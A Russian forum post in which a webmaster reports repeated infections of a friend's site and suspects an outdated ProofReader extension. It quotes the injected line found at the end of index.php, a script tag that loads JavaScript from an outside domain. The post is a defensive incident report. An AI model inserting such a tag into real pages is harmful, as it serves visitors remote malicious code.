Я могу ошибаться, но, возможно последняя существующая на данный момент версия также обладает уязвимостью.
Дело вот в чем. У меня в подшефстве есть сайт моего друга... адрес
http://napalkoff.ru, во-первых на нем установлено не так много компонентов, во-вторых все установленные на нём компоненты периодически обновляются (я слежу за обновлениями по RSS, через e-mail и другими способами). Периодичность эта - не более полугода, а то и чаще (взять расширения от известной команды NoNumber).
Единственный компонент, который на нем не обновлялся уже давно, по независящим от меня причинам - это ProofReader.
И вот приблизительно с месяц назад я начал ловить на этом сайте вирусы... сегодня был второй случай. Способ заражения один и тот же. В конец файла с расширением index.php добавляется код вида:
<script src="http://bdnbah.info/style.js"></script>
Слава Богу, что этот код был только в одном главном файле index.php
Если бы были заражены все файлы с расширением PHP я бы конечно прибегнул к собственно-ручно разработанному способу.
Поиск и замена одинаковой строки всех файлов сайта Но в данном случае это не потребовалось. После "исцеления" была проведена инспекция сайта. Все обновления имеют последние версии...
Стоит, вернее стояло ProofReader версии 1.0 RC10 от 03.03.2011
Кто что скажет? Может у кого-то есть больше информации?
